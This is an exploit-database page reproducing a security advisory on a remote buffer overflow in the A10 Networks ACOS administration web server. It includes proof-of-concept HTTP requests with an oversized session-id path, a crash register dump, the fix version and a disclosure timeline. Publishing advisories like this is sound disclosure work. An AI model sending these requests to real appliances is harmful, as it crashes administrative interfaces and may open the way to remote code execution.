0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
A10 Networks ACOS 2.7.0-P2(build: 53) - Buffer Overflow
=== Details === Advisory: http://www.quantumleap.it/a10-networks-remote-buffer-overflow-softax/ Affected Product: ACOS Version: 2.7.0-P2(build: 53) (older versions may be affected too) (Tested on SoftAX[2]) === Executive Summary === Using a specially crafted HTTP request to the administration web server, it is possible to exploit a lack in the user input validation. Successful exploitation of the vulnerability may result in remote code execution. Unsuccessful exploitation of the vulnerability may result in a Denial of Service of the administrative interface. === Proof of Concept === Submitting arbitrary input in the HTTP request it?s possible to cause a buffer overflow. If you provide an overly long ?session id? in the request, the web server crashes. To reproduce the crash you can send one of the following requests to the web server: <HTTPREQ1> GET /US/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sys_reboot.html HTTP/1.1 Host: 192.168.1.210 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive </HTTPREQ1> <HTTPREQ2> GET /US/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sys_reboot.html HTTP/1.1 Host: 192.168.1.210 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive <HTTPREQ2> Once the crash occurs the following is the registers state of the SoftAX appliance: <REGSTATE> rax 0×0 0 rbx 0x1e30300 31654656 rcx 0×6 6 rdx 0xffffffff 4294967295 rsi 0xcac18f12 3401682706 rdi 0×4141414141414141 4702111234474983745 rbp 0×4141414141414141 0×4141414141414141 rsp 0x7fffbdf9b400 0x7fffbdf9b400 r8 0×2000 8192 r9 0×20 32 r10 0×0 0 r11 0x7f10b4cec180 139709729653120 r12 0×0 0 r13 0x1e30318 31654680 r14 0x1e30300 31654656 r15 0x1e33b58 31669080 rip 0×524149 0×524149 eflags 0×10246 [ PF ZF IF RF ] cs 0×33 51 ss 0x2b 43 ds 0×0 0 es 0×0 0 fs 0×0 0 gs 0×0 0 fctrl 0x37f 895 fstat 0×0 0 ftag 0xffff 65535 fiseg 0×0 0 fioff 0×0 0 foseg 0×0 0 fooff 0×0 0 fop 0×0 0 mxcsr 0x1f80 [ IM DM ZM OM UM PM ] </REGSTATE> === Solution === To fix the A10 Networks remote Buffer Overflow you have to upgrade at least to version 2.7.0-p6 === Disclosure Timeline === 2013-05-11 ? A10 Networks remote Buffer Overflow discovered 2013-05-28 ? Initial vendor notification 2013-05-30 ? The vendor acknowledge the vulnerability (bug 128069 ) 2014-03-28 ? The vendor fixed the vulnerability[3] 2014-04-02 ? Public advisory === Discovered by === Vulnerability discovered by Francesco Perna of Quantum Leap s.r.l === References === [1] http://www.a10networks.com/about/technology_platform_acos.php [2] http://www.a10networks.com/glossary/SoftAX.php [3] https://www.a10networks.com/support-axseries/downloads/AX_Series_270-P6_RelNotes_20140328.pdf # 0day.today [2024-11-15] #